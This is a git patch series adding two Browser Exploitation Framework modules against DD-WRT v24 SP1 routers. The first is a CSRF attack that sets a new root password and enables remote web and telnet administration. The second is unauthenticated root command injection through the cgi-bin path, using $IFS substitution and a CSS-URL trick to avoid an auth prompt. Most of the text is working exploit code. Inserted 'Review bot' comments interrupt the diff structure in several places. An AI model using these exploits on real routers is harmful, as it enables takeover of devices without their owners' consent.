From fd46915bf2d04375fdd9b2462d1c339a3bf41e17 Mon Sep 17 00:00:00 2001
From: soh_cah_toa
Date: Mon, 16 Jun 2014 09:48:14 -0400
Subject: [PATCH 1/2] Added module for DD-WRT v24 SP1 CSRF vulnerability (issue #1006).
---
 .../router/ddwrt_v24_sp1_csrf/command.js | 57 +++++++++++++++++++
 .../router/ddwrt_v24_sp1_csrf/config.yaml | 16 ++++++
 .../router/ddwrt_v24_sp1_csrf/module.rb | 37 ++++++++++++
 3 files changed, 110 insertions(+)
 create mode 100644 modules/exploits/router/ddwrt_v24_sp1_csrf/command.js
 create mode 100644 modules/exploits/router/ddwrt_v24_sp1_csrf/config.yaml
 create mode 100644 modules/exploits/router/ddwrt_v24_sp1_csrf/module.rb
diff --git a/modules/exploits/router/ddwrt_v24_sp1_csrf/command.js b/modules/exploits/router/ddwrt_v24_sp1_csrf/command.js
new file mode 100644
index 000000000..271d6e0f8
--- /dev/null
+++ b/modules/exploits/router/ddwrt_v24_sp1_csrf/command.js
@@ -0,0 +1,57 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+ var host = '<%= @host %>';
+ var password = '<%= @password %>';
+ var port = '<%= @port %>';
+ var telnet = '<%= @telnet %>';
+ var path = 'apply.cgi';
+
+ if (!host.match(/\/$/))
+ host += '/';
+
+ var ddwrt_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(
+ host + path,
+ 'POST', 'application/x-www-form-urlencoded', [
+ { 'type': 'hidden', 'name': 'submit_button', 'value': 'Management' },
+ { 'type': 'hidden', 'name': 'action', 'value': 'ApplyTake' },
+ { 'type': 'hidden', 'name': 'change_action', 'value': '' },
+ { 'type': 'hidden', 'name': 'submit_type', 'value': '' },
+ { 'type': 'hidden', 'name': 'commit', 'value': '1' },
+ { 'type': 'hidden', 'name': 'PasswdModify', 'value': '0' },
+ { 'type': 'hidden', 'name': 'remote_mgt_https', 'value': '' },
+ { 'type': 'hidden', 'name': 'http_enable', 'value': '1' },
+ { 'type': 'hidden', 'name': 'info_passwd', 'value': '0' },
+ { 'type': 'hidden', 'name': 'https_enable', 'value': '' },
+ { 'type': 'hidden', 'name': 'http_username', 'value': 'root' },
+ { 'type': 'hidden', 'name': 'http_passwd', 'value': password },
+ { 'type': 'hidden', 'name': 'http_passwdConfirm', 'value': password },
+ { 'type': 'hidden', 'name': '_http_enable', 'value': '1' },
+ { 'type': 'hidden', 'name': 'refresh_time', 'value': '3' },
+ { 'type': 'hidden', 'name': 'status_auth', 'value': '1' },
+ { 'type': 'hidden', 'name': 'maskmac', 'value': '1' },
+ { 'type': 'hidden', 'name': 'remote_management', 'value': '1' },
+ { 'type': 'hidden', 'name': 'http_wanport', 'value': port },
+ { 'type': 'hidden', 'name': 'remote_mgt_telnet', 'value': '1' },
+ { 'type': 'hidden', 'name': 'telnet_wanport', 'value': telnet },
+ { 'type': 'hidden', 'name': 'boot_wait', 'value': 'on' },
+ { 'type': 'hidden', 'name': 'cron_enable', 'value': '1' },
+ { 'type': 'hidden', 'name': 'cron_jobs', 'value': '' },
+ { 'type': 'hidden', 'name': 'loopback_enable', 'value': '1' },
+ { 'type': 'hidden', 'name': 'nas_enable', 'value': '1' },
+ { 'type': 'hidden', 'name': 'resetbutton_enable', 'value': '1' },
+ { 'type': 'hidden', 'name': 'zebra_enable', 'value': '1' },
+ { 'type': 'hidden', 'name': 'ip_conntrack_max', 'value': '512' },
+ { 'type': 'hidden', 'name': 'ip_conntrack_tcp_timeouts', 'value': '3600' },
+ { 'type': 'hidden', 'name': 'ip_conntrack_udp_timeouts', 'value': '120' },
+ { 'type': 'hidden', 'name': 'overclocking', 'value': '200' }
+ ]);
+
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=exploit attempted');
+
+ setTimeout(function() { document.body.removeChild(ddwrt_iframe_<%= @command_id %>) }, 15 * 1000);
+});
diff --git a/modules/exploits/router/ddwrt_v24_sp1_csrf/config.yaml b/modules/exploits/router/ddwrt_v24_sp1_csrf/config.yaml
new file mode 100644
index 000000000..5d7ac9e7a
--- /dev/null
+++ b/modules/exploits/router/ddwrt_v24_sp1_csrf/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ ddwrt_v24_sp1_csrf:
+ enable: true
+ category: ['Exploits', 'Router']
+ name: 'DD-WRT v24 SP1 CSRF'
+ description: 'Abuses a CSRF vulnerability in DD-WRT v24 SP1 to enable remote
+ administration with a new root password.'
+ authors: ['soh_cah_toa']
+ target:
+ working: ['ALL']
diff --git a/modules/exploits/router/ddwrt_v24_sp1_csrf/module.rb b/modules/exploits/router/ddwrt_v24_sp1_csrf/module.rb
new file mode 100644
index 000000000..5976883bc
--- /dev/null
+++ b/modules/exploits/router/ddwrt_v24_sp1_csrf/module.rb
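Review bot: `beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=exploit attempted');` near the end of command.js fires unconditionally and immediately, before the injected form has had a chance to submit and long before the 15-second removal timer runs, so the stored result never reflects whether the request left the browser or what the router did with it; nothing better is observable from a cross-origin iframe, but that limit should be stated, e.g. `// The cross-origin response is not readable; 'exploit attempted' only records that the form was injected.` above the send. The same unconditional report is in ddwrt_v24_sp1_cmd_exec/command.js in the second patch. Separately, the option values are dropped into single-quoted JS literals (`var host = '<%= @host %>';` and the password, port and telnet lines) with no escaping, so an operator-entered value containing a quote or backslash yields a syntax error in the hooked page instead of a visible failure; escaping them for a JavaScript string context at template time, or validating them in module.rb before they reach the template, would avoid that.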
@@ -0,0 +1,37 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Ddwrt_v24_sp1_csrf < BeEF::Core::Command
+
+ def self.options
+ return [
+ {
+ 'name' => 'host',
+ 'ui_label' => 'Router web root',
+ 'value' => 'http://192.168.1.1/'
+ },
+ {
+ 'name' => 'password',
+ 'ui_label' => 'Desired password',
+ 'value' => '__BeEF__'
+ },
+ {
+ 'name' => 'port',
+ 'ui_label' => 'Desired web ui port',
+ 'value' => '8080'
+ },
+ {
+ 'name' => 'telnet',
+ 'ui_label' => 'Desired telnet port',
+ 'value' => '23'
+ }
+ ]
+ end
+
+ def post_execute
+ save('result' => @datastore['result'])
+ end
+
+end
From f490faa858cff7339f791423785981accd4b2974 Mon Sep 17 00:00:00 2001
From: soh_cah_toa
Date: Mon, 16 Jun 2014 09:56:27 -0400
Subject: [PATCH 2/2] Added module for DD-WRT v24 SP1 RCE vulnerability (issue #1006).
---
 .../router/ddwrt_v24_sp1_cmd_exec/command.js | 26 ++++++++++++++++++
 .../router/ddwrt_v24_sp1_cmd_exec/config.yaml | 18 +++++++++++++
 .../router/ddwrt_v24_sp1_cmd_exec/module.rb | 27 +++++++++++++++++++
 3 files changed, 71 insertions(+)
 create mode 100644 modules/exploits/router/ddwrt_v24_sp1_cmd_exec/command.js
 create mode 100644 modules/exploits/router/ddwrt_v24_sp1_cmd_exec/config.yaml
 create mode 100644 modules/exploits/router/ddwrt_v24_sp1_cmd_exec/module.rb
diff --git a/modules/exploits/router/ddwrt_v24_sp1_cmd_exec/command.js b/modules/exploits/router/ddwrt_v24_sp1_cmd_exec/command.js
new file mode 100644
index 000000000..cd61a105d
--- /dev/null
+++ b/modules/exploits/router/ddwrt_v24_sp1_cmd_exec/command.js
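Review bot: `return [` in `self.options` is redundant in Ruby — the array literal is the method's last expression — so the keyword should be dropped and the closing `]` left as the value; ddwrt_v24_sp1_cmd_exec/module.rb in the second patch has the same pattern. `post_execute` also saves `@datastore['result']` without any note of what that holds, and judging from command.js it is only ever the fixed string `exploit attempted`; a one-line comment above `save`, such as `# 'result' is the fixed status string the command script reports, not an indicator of success`, would keep a later reader from treating it as confirmation.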
@@ -0,0 +1,26 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+ var host = '<%= @host %>';
+ var cmd = '<%= @cmd %>';
+ var path = 'cgi-bin/;';
+
+ if (!host.match(/\/$/))
+ host += '/';
+
+ if (cmd.indexOf(' ') != -1)
+ cmd = cmd.replace(/\s+/g, '$IFS');
+
+ // Prevent auth dialog by generating the request via a CSS URL instead of an invisible iframe.
+ var ddwrt_div_<%= @command_id %> = document.createElement('div');
+ ddwrt_div_<%= @command_id %>.setAttribute('style', 'background-image: url("' + host + path + cmd + '")');
+ document.body.appendChild(ddwrt_div_<%= @command_id %>);
+
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=exploit attempted');
+
+ setTimeout(function() { document.body.removeChild(ddwrt_div_<%= @command_id %>) }, 15 * 1000);
+});
diff --git a/modules/exploits/router/ddwrt_v24_sp1_cmd_exec/config.yaml b/modules/exploits/router/ddwrt_v24_sp1_cmd_exec/config.yaml
new file mode 100644
index 000000000..80323b501
--- /dev/null
+++ b/modules/exploits/router/ddwrt_v24_sp1_cmd_exec/config.yaml
@@ -0,0 +1,18 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ ddwrt_v24_sp1_cmd_exec:
+ enable: true
+ category: ['Exploits', 'Router']
+ name: 'DD-WRT v24 SP1 Command Execution'
+ description: 'DD-WRT v24 SP1 fails to properly handle metacharacters in the
+ HTTP management interface. This module abuses that flaw by injecting
+ metacharacters to allow an unauthenticated attacker to execute arbitrary
+ commands as the root user.'
+ authors: ['soh_cah_toa']
+ target:
+ working: ['ALL']
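Review bot: `if (cmd.indexOf(' ') != -1)` uses loose inequality; `!==` is the idiom and avoids a coercing compare, i.e. `if (cmd.indexOf(' ') !== -1)`. The guard also checks only for a plain space while the `replace` on the next line matches `\s+`, so a short comment explaining why the two conditions differ (or noting that the guard is merely an optimisation) would help a later reader. The `15 * 1000` removal delay in the `setTimeout` is duplicated from ddwrt_v24_sp1_csrf/command.js; naming it once, `var cleanupDelayMs = 15 * 1000;`, would make the shared timing explicit.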
diff --git a/modules/exploits/router/ddwrt_v24_sp1_cmd_exec/module.rb b/modules/exploits/router/ddwrt_v24_sp1_cmd_exec/module.rb
new file mode 100644
index 000000000..9cad9bb6d
--- /dev/null
+++ b/modules/exploits/router/ddwrt_v24_sp1_cmd_exec/module.rb
@@ -0,0 +1,27 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Ddwrt_v24_sp1_cmd_exec < BeEF::Core::Command
+
+ def self.options
+ return [
+ {
+ 'name' => 'host',
+ 'ui_label' => 'Router web root',
+ 'value' => 'http://192.168.1.1/'
+ },
+ {
+ 'name' => 'cmd',
+ 'ui_label' => 'Command',
+ 'value' => 'reboot'
+ }
+ ]
+ end
+
+ def post_execute
+ save('result' => @datastore['result'])
+ end
+
+end